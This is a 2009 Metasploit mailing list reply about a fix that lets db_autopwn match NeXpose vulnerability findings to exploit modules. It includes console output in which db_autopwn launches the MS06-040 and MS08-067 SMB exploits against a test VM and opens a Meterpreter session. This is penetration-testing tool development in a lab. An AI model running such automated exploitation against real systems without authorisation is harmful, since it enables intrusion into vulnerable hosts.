Metasploit mailing list archives
Re: db_autopwn & NeXpose
From: John Sawyer <jsawyer () ufl edu>
Date: Thu, 3 Dec 2009 11:22:17 -0500
On Dec 2, 2009, at 8:36 PM, HD Moore wrote:

> On Wed, 2009-12-02 at 16:28 -0500, John Sawyer wrote:
>> Great work on the new updates. I took the NeXpose plugin for a test drive today and everything seems to be working as expected except that db_autopwn is not mapping the CVE-2006-3439 vulnerability to the exploit for MS06-040. I have a VM with Windows XP SP2 that is definitely vulnerable. I confirmed it is vulnerable by exploiting it. Is there something I'm missing or is there a CVE name mismatch when PWN_XREF does the lookup?
>
> All fixed, svn update :-)
>
> This update also improves db_autopwn usability quite a bit.
HD, you're the man! I saw you made multiple changes (nexpose.rb & db.rb) since your e-mail last night and this morning. Around 1am, I got the first chunk of output below, and this morning after another update, I get even more accurate results.
I know I probably shouldn't use the autopwn at the end since it is trying both exploits, but it's there so I couldn't help myself. It worked without a problem. Very sweet!
Your turnaround time is amazing. Keep up the awesome work.

-jhs

msf > db_autopwn -t -x
[*] Analysis completed in 3 seconds (3 vulns / 1761 refs)
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 172.16.1.163:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] ================================================================================
[*]
[*]

msf > db_autopwn -e -r -t -x
[*] Analysis completed in 3 seconds (4 vulns / 1763 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 172.16.1.163:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] 172.16.1.163:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] ================================================================================
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 172.16.1.163:445...
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 172.16.1.163:445...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.1.12:31783 -> 172.16.1.163:1036)
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

  Id  Description  Tunnel                                   Via
  --  -----------  ------                                   ---
  1   Meterpreter  192.168.1.12:31783 -> 172.16.1.163:1036  windows/smb/ms08_067_netapi

[*] ================================================================================
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- db_autopwn & NeXpose John Sawyer (Dec 02)
- Re: db_autopwn & NeXpose HD Moore (Dec 02)
- Re: db_autopwn & NeXpose HD Moore (Dec 02)
- Re: db_autopwn & NeXpose John Sawyer (Dec 03)